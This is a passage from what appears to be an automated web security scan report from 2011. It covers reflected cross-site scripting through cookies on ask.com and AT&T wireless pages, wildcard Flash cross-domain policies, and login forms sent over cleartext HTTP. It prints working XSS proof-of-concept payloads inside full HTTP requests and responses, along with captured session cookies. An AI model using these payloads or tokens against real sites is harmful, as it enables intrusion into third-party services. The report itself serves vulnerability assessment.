Confidence:   Certain
Host:   http://www.ask.com
Path:   /web

Issue detail

The value of the cu.wz cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dc8a"><script>alert(1)</script>01fc5f08645 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /web?q=xss&search=&qsrc=0&o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=04dc8a"><script>alert(1)</script>01fc5f08645; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjAyLVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.1.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_uid=0A42E34A946D4254193520127E77B26A; wz_sid=084EE34C926D4254193520127E77B26A; wz_scnt=1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklkvgpcQDgAACSm0SYAAADA
from-tr: trafrt008iad.io.askjeeves.info
Content-Length: 109937
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:26:07 GMT
Connection: close
Set-Cookie: gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:26:07 GMT; Path=/
Set-Cookie: clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:26:07 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-eHNz; Domain=.ask.com; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjA3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:26:07 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - W
...[SNIP]...
<img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=a&app=a14&l=dir&o=0&sv=0a5c407b&p=web&rf=0&ord=2983056&cu.wz=04dc8a"><script>alert(1)</script>01fc5f08645" height=1 width=1 id="SessionTracker" />
...[SNIP]...

1.121. http://www.ask.com/web [cu.wz cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /web

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2e0a"-alert(1)-"b5e3a9ba348 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web?q=xss&search=&qsrc=0&o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0d2e0a"-alert(1)-"b5e3a9ba348; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjAyLVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.1.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_uid=0A42E34A946D4254193520127E77B26A; wz_sid=084EE34C926D4254193520127E77B26A; wz_scnt=1

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TklkwgpcQKMAAFY@ZiAAAAEO
from-tr: trafrt011iad.io.askjeeves.info
Cache-Control: private
Content-Length: 110383
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:26:11 GMT
Connection: close
Set-Cookie: gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:26:11 GMT; Path=/
Set-Cookie: clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:26:11 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-eHNz; Domain=.ask.com; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjExLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:26:11 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - W
...[SNIP]...
new Image();
st.height = 1;
st.width = 1;
st.id = "SessionTracker";
st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=a&app=a14&l=dir&o=0&sv=0a5c4072&p=web&rf=0&ord=3259623&cu.wz=0d2e0a"-alert(1)-"b5e3a9ba348";


</script>
...[SNIP]...

1.122. http://www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp [B2CSESSIONID cookie]

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/windows-packages.jsp

Issue detail

The value of the B2CSESSIONID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8415</script><a>c26c8c4bf0d was submitted in the B2CSESSIONID cookie. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cell-phone-service/packages/windows-packages.jsp HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.2.10.1313431966; TLTHID=334FB54EC76B10C7B47BF82B0BF36CDD; TLTSID=31A640C8C76B10C7A09DCAEB2DFC8A0E; B2CSESSIONID=1fKdTJjTTvqPt1!1142544054a8415</script><a>c26c8c4bf0d; DYN_USER_ID=4148005476; DYN_USER_CONFIRM=d958665c301d296eb3ee49e91430ee35; BIGipServerpWL_7010_7011=3989950855.25115.0000; wtAka=y; 
fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001693504923%22%2C%22poc_login%22%3A%22no%22%2C%22bus_support%22%3A%22no%22%2C%22ufix%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22015A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221313432472549_500300%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Ffree-packages.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d9%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A9%2C%22sd%22%3A9%7D; __utmc=241758596; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Ffree-packages.jsp%22%2C%22r%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22t%22%3A1313432484011%2C%22u%22%3A%226923670900791695274%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Fwindows-packages.jsp%22%2C%22l%22%3A%22Windows%C2%AE%20Packages%22%2C%22de%22%3A%7B%22su%22%3A%22Find%20great%20free%20Phone%20deals%20and%20packages%20at%20AT%26T%20that%20can%20help%20save%20you%20money%20at%20AT%26T.%20Wireless%20from%20AT%26T.%20Wireless%20from%20AT%26T.%22%2C%22ti%22%3A%22Free%20Phone%20Deals%20and%20Packages%20-%20Shop%20-%20Wireless%20from%20AT%26T%22%2C%22nw%22%3A1812%2C%22nl%22%3A185%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 103725
Expires: Mon, 15 Aug 2011 18:21:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:21:20 GMT
Connection: close
Set-Cookie: TLTHID=5F5A1B66C76B10C7A276A9FCD465FFF0; Path=/; Domain=.att.com
Set-Cookie: B2CSESSIONID=rsYZTJjfL3y0VV!1152165740; path=/; HttpOnly
Set-Cookie: DYN_USER_ID=4148392065; path=/
Set-Cookie: DYN_USER_CONFIRM=844c64bbbcdbe9b5aae43a780d8f9ae8; path=/


...[SNIP]...
<script type="text/javascript" charset="utf-8">
   function SessionVars() {
       this.getCurrSessId = function() {
           var pSessionId = '1fKdTJjTTvqPt1!1142544054a8415</script><a>c26c8c4bf0d';
           return pSessionId;
       };

       this.getCurrBrowserId = function() {
           var pBrowserId;
           pBrowserId = this.getCookie('browserid');
           return pBrowserId;
       };
       
       this.getCookie = function(name) {
   
...[SNIP]...

2. Flash cross-domain policy
There are 6 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


2.1. http://at-img2.tdimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://at-img2.tdimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: at-img2.tdimg.com

Response

HTTP/1.1 200 OK
Server: tws/0.1
Date: Mon, 15 Aug 2011 18:56:33 GMT
Content-Type: text/xml
Content-Length: 148
Last-Modified: Mon, 28 Sep 2009 06:30:00 GMT
Connection: close
Expires: Tue, 14 Aug 2012 18:56:33 GMT
Cache-Control: max-age=31536000
Accept-Ranges: bytes

<?xml version="1.0"?>
<!-- http://www.tudou.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

2.2. http://at-img3.tdimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://at-img3.tdimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: at-img3.tdimg.com
Proxy-Connection: keep-alive
Referer: http://js.tudouui.com/bin/channels/IndexAdPanelAct_26.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: tws/0.1
Date: Mon, 15 Aug 2011 18:56:26 GMT
Content-Type: text/xml
Content-Length: 152
Last-Modified: Fri, 14 Aug 2009 08:46:15 GMT
Connection: keep-alive
Expires: Tue, 14 Aug 2012 18:56:26 GMT
Cache-Control: max-age=31536000
Accept-Ranges: bytes

<?xml version="1.0"?>
<!-- http://www.toodou.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

2.3. http://at-img4.tdimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://at-img4.tdimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: at-img4.tdimg.com
Proxy-Connection: keep-alive
Referer: http://js.tudouui.com/bin/channels/IndexAdPanelAct_26.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: tws/0.1
Date: Mon, 15 Aug 2011 18:56:20 GMT
Content-Type: text/xml
Content-Length: 148
Last-Modified: Mon, 28 Sep 2009 06:30:00 GMT
Connection: keep-alive
Expires: Tue, 14 Aug 2012 18:56:20 GMT
Cache-Control: max-age=31536000
Accept-Ranges: bytes

<?xml version="1.0"?>
<!-- http://www.tudou.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

2.4. http://stat.tudou.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://stat.tudou.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: stat.tudou.com

Response

HTTP/1.1 200 OK
ETag: W/"152-1275381096000"
Age: 1
Content-Length: 152
Date: Mon, 15 Aug 2011 17:34:10 GMT
X-Cache: HIT from stat.tudou.com
Last-Modified: Tue, 01 Jun 2010 08:31:36 GMT
Server: Apache
Content-Type: application/xml
Connection: Keep-Alive

<?xml version="1.0"?>
<!-- http://www.toodou.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

2.5. http://www.xhamstercams.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.xhamstercams.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.xhamstercams.com

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:56:49 GMT
Server: Apache
Last-Modified: Wed, 03 Mar 2010 19:12:09 GMT
Accept-Ranges: bytes
Content-Length: 218
P3P: policyref="http://www.streamate.com/p3p/ns.xml", CP="NOI DSP COR CUR ADMa DEVa OUR IND UNI STA"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.naiadsystems.com" />
</cros
...[SNIP]...

2.6. http://xhamster.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://xhamster.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: xhamster.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 18:56:31 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Wed, 23 Jun 2010 11:17:08 GMT
ETag: "11a0e3b-75-489b0adaeb500"
Accept-Ranges: bytes
Content-Length: 117

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.xhamster.com" />
</cross-domain-policy>

3. Cleartext submission of password
There are 14 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://js.mail.sohu.com/passport/pi18030.201011300952.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.mail.sohu.com
Path:   /passport/pi18030.201011300952.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /passport/pi18030.201011300952.js HTTP/1.1
Host: js.mail.sohu.com
Proxy-Connection: keep-alive
Referer: http://www.sohu.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Connection: keep-alive
Server: nginx/0.7.65
Date: Sun, 24 Jul 2011 08:59:30 GMT
Last-Modified: Tue, 30 Nov 2010 01:52:14 GMT
Expires: Sat, 22 Oct 2011 08:59:30 GMT
Cache-Control: max-age=7776000
FSS-Cache: HIT from 3805485.5968183.4789070
Content-Length: 14086

function changebg(A){if(A==1){getObject("pCardOpen").className="open hidden";getObject("pCardClose").className="close";PassportSC.cElement.className="passportc";PassportSC.cElement.style.display="bloc
...[SNIP]...
;TopUtils.Deletecookie("SOHUID")};PassportSC.showMsg=function(msg){var e=document.getElementById("loginMsg");if(e!=null){e.innerHTML=msg}};PassportSC._drawLoginForm=function(){this.cElement.innerHTML='<form method="post" onsubmit="return PassportSC.doLogin();" name="loginform"><div class="passportc_title">
...[SNIP]...
<li>..&nbsp;&nbsp;.. <input name="password" type="password" class="ppinput" autocomplete="off" disableautocomplete /></li>
...[SNIP]...

3.2. http://www.ask.com/settings

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /settings

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /settings HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllNwpcQDgAACSmEQcAAADE
from-tr: trafrt008iad.io.askjeeves.info
Cache-Control: no-cache
Content-Length: 65232
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:07 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:07 GMT; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
</div>
<form name="myForm2" id="myForm2">
<div id="passsuccessmsg">
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="currentpassword" id="currentpassword" value=""></div>
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="newpassword" id="newpassword" value=""> </div>
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="password" id="password" value=""> </div>
...[SNIP]...

3.3. http://www.mediafire.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediafire.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.mediafire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:59 GMT
Cache-control: private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Content-Length: 28867
Connection: close
Content-Type: text/html; charset=UTF-8
Server: MediaFire

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</p> <form action="/dynamic/tw_login.php" target="userwork" method="POST" onsubmit="wP(2);return true;"> <label>
...[SNIP]...
</label> <input type="password" name="mf2_password" id="mf2_password" class="login_box"> <a href="/lost_password.php" class="soc_pwd_link" target="_top">
...[SNIP]...

3.4. http://www.mediafire.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediafire.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.mediafire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:59 GMT
Cache-control: private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Content-Length: 28867
Connection: close
Content-Type: text/html; charset=UTF-8
Server: MediaFire

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</p> <form action="/dynamic/fb_login.php" target="userwork" method="POST" id="link_mf_acct_form" onsubmit="wP(2);return true;"> <label>
...[SNIP]...
</label> <input type="password" name="mf2_password" id="mf2_password" class="login_box"> <a href="/lost_password.php" class="soc_pwd_link" target="_top">
...[SNIP]...

